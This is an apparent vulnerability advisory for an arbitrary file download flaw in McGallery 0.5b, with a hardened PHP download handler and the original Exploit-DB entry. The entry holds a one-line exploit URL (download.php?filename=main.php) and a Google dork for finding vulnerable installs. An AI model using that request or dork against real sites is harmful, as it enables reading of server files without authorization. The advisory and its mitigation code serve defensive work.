Vendor: McGallery
By: Piker
CVSS: 8.5 (HIGH)
Arbitrary File Download
CWE: 22
Product Name: McGallery
Affected Version From: 0.5b
Affected Version To: 0.5b
Patch Exists: NO
CPE: a:mcgallery:mcgallery:0.5b
Platforms Tested:
2007

McGallery 0.5b Arbitrary File Download Vulnerability

The vulnerability allows an attacker to download arbitrary files from the target system by exploiting the 'download.php' script in McGallery 0.5b. By manipulating the 'filename' parameter, an attacker can specify any file to be downloaded, including sensitive system files.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to a newer version of McGallery that addresses this issue.
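
Since no vendor patch exists, the 'filename' parameter has to be constrained by the site operator. The following is an added example of a hardened download handler, not McGallery's own code; the image directory `GALLERY_DIR`, the extension allow-list and the function name `resolve_download` are assumptions made for illustration.

```php
<?php
// Added example: hardened download handler. Not McGallery code.
// GALLERY_DIR and ALLOWED_EXT are assumptions about the deployment.
const GALLERY_DIR = __DIR__ . '/images';            // hypothetical image root
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];  // assumed gallery file types

/**
 * Map the user-supplied name to a real file inside $baseDir.
 * Returns the absolute path, or null when the request must be refused.
 */
function resolve_download($requested, string $baseDir = GALLERY_DIR): ?string
{
    // Refuse arrays (?filename[]=x), empty values and embedded NUL bytes.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Allow-list by extension: scripts such as main.php are never served.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // realpath() collapses "..", duplicate slashes and symlinks.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment: the resolved path must still sit under the image root.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_download($_GET['filename'] ?? null);
if ($file === null) {
    http_response_code(404);   // same response for "missing" and "forbidden"
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . addcslashes(basename($file), '"\\') . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
```

The extension check and the containment check are independent: the first stops source files in the same directory from being served, the second stops any path that resolves outside the image root.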

Exploit-DB raw data:

################## Piker #######################################
#
#
#    McGallery 0.5b Arbitrary File Download Vulnerability
#
#
#    Affected software: McGallery 0.5b
#    Vendor: http://sourceforge.net/projects/mcgallery/
#    Dork: allintitle: "MCgallery 0.5b"
#
################################################################
#
#    http://[target]/[path]/download.php?filename=main.php
#
################################################################
#
#                   Found by Piker
#                   The Am0s Team
#
#    Greetz: KX-T33, kakalake, nAzGuL, Putus, sn4ke
#
################################################################

# milw0rm.com [2007-03-15]